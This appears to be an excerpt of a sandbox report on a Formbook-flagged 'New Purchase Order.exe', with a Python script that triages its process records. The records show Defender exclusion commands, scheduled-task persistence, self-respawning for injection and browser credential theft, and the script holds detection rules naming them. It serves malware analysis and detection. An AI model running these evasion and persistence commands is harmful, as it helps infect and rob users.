Source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSETUPUGC.EXEj% vs New Purchase Order.exe
Source: New Purchase Order.exe | Binary or memory string: OriginalFilenameLOAk.exe@ vs New Purchase Order.exe
Source: New Purchase Order.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.4113419509.0000000005180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4111833572.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4111885558.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4110362323.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.4111744299.00000000048F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: New Purchase Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ibDqDkseW.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: _0020.SetAccessControl
Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: _0020.AddAccessRule
Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, wRGX8wQWID9wFOoes1.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, wRGX8wQWID9wFOoes1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: _0020.SetAccessControl
Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: _0020.AddAccessRule
Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, wRGX8wQWID9wFOoes1.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, wRGX8wQWID9wFOoes1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, wRGX8wQWID9wFOoes1.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, wRGX8wQWID9wFOoes1.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: _0020.SetAccessControl
Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.cs | Security API names: _0020.AddAccessRule
Source: New Purchase Order.exe, ibDqDkseW.exe.0.dr | Binary or memory string: *.slnEError processing directory {0} {1}#Deleting file {0}%Modifying file {0}=Unable to Delete file {0}. {1}.tmpWGlobalSection(TeamFoundationVersionControl)!EndGlobalSection
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/16@15/12
Source: C:\Users\user\Desktop\New Purchase Order.exe | File created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Mutant created: \Sessions\1\BaseNamedObjects\rhwBynzqn
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Users\user\Desktop\New Purchase Order.exe | File created: C:\Users\user\AppData\Local\Temp\tmp83A4.tmp
Source: New Purchase Order.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: New Purchase Order.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\New Purchase Order.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\New Purchase Order.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setupugc.exe, 00000011.00000002.4110652800.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.2086542672.00000000032FA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: New Purchase Order.exe | Virustotal: Detection: 30%
Source: C:\Users\user\Desktop\New Purchase Order.exe | File read: C:\Users\user\Desktop\New Purchase Order.exe
Source: unknown | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe C:\Users\user\AppData\Roaming\ibDqDkseW.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe | Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
Source: C:\Windows\SysWOW64\setupugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe | Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
Source: C:\Windows\SysWOW64\setupugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
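The process-creation records above carry the whole chain a detection engineer cares about: PowerShell adding Defender exclusions for the sample and its dropped copy, schtasks.exe registering the "Updates\ibDqDkseW" task from an XML file in the user's Temp folder, each stage re-launching its own image (the hollowing step that precedes the injected Formbook payload), a system binary (setupugc.exe) launched from a randomly named directory under Program Files (x86), and that system binary then starting Firefox. The following added example (not part of the Joe Sandbox report) parses those records and applies one rule per pattern. The input is a constructed sample that copies the report's records into a fixed "Source: parent | Process created: child command line" layout; the rule names, the 32-letter threshold for a "random" directory name and the browser list are the example's own assumptions, and the rules are indicators to review, not proof of compromise on their own.

```python
# Added example, not from the report: triage Joe Sandbox process-creation records.
import re
from pathlib import PureWindowsPath

# Constructed sample: the report's records, one per line, in the layout
# "Source: <parent image> | Process created: <child image> <command line>".
RECORDS = r"""
Source: unknown | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\New Purchase Order.exe | Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe C:\Users\user\AppData\Roaming\ibDqDkseW.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe | Process created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe | Process created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
Source: C:\Windows\SysWOW64\setupugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
"""

LINE = re.compile(r'^Source: (?P<parent>.+?) \| Process created: (?P<child>.+?\.exe)(?: (?P<cmdline>.*))?$', re.I)
EXCLUSION = re.compile(r'-ExclusionPath\s+"?([^"]+)"?', re.I)
TASK_NAME = re.compile(r'/TN\s+"?([^"]+)"?', re.I)
TEMP_XML = re.compile(r'/XML\s+"?[^"]*\\AppData\\Local\\Temp\\', re.I)
RANDOM_DIR = re.compile(r'\\[A-Za-z]{32,}\\')   # assumption: 32+ letters with no digits, spaces or dots
BROWSERS = {'firefox.exe', 'chrome.exe', 'msedge.exe', 'iexplore.exe'}  # assumption: browsers worth flagging


def parse(records):
    """Return (parent image, child image, command line) for every well-formed record."""
    events = []
    for line in records.splitlines():
        m = LINE.match(line.strip())
        if m:
            events.append((m['parent'], m['child'], m['cmdline'] or ''))
    return events


def _name(path):
    return PureWindowsPath(path).name.lower()


def triage(events):
    """Apply one rule per pattern; each finding is (rule, parent name, child name, detail)."""
    findings = []
    for parent, child, cmd in events:
        p, c = _name(parent), _name(child)
        if c == 'powershell.exe' and 'add-mppreference' in cmd.lower():
            m = EXCLUSION.search(cmd)                       # Defender exclusion for a path
            findings.append(('defender_exclusion', p, c, m.group(1) if m else cmd))
        if c == 'schtasks.exe' and '/create' in cmd.lower() and TEMP_XML.search(cmd):
            m = TASK_NAME.search(cmd)                       # task definition supplied from Temp
            findings.append(('schtasks_xml_from_temp', p, c, m.group(1) if m else cmd))
        if parent.lower() == child.lower():                 # image re-launches itself: hollowing/RunPE staging
            findings.append(('self_spawn', p, c, child))
        if RANDOM_DIR.search(parent):                       # parent lives in a random-looking directory
            findings.append(('random_named_parent_dir', p, c, str(PureWindowsPath(parent).parent)))
        if parent.lower().startswith('c:\\windows\\') and c in BROWSERS:
            findings.append(('system_binary_spawns_browser', p, c, child))
    return findings


def summarize(findings):
    """Count findings per rule."""
    counts = {}
    for rule, *_ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == '__main__':
    for f in triage(parse(RECORDS)):
        print('%-30s %-24s -> %-16s %s' % f)
```

Run against the sample, the rules fire nine times: two Defender exclusions, two task registrations from Temp, three self-spawns, one random-directory parent and one browser launched by a Windows binary. The conhost.exe and WmiPrvSE.exe children produce nothing, which is the point of keying each rule on the child image and its arguments rather than on "unusual" names alone.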
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\New Purchase Order.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
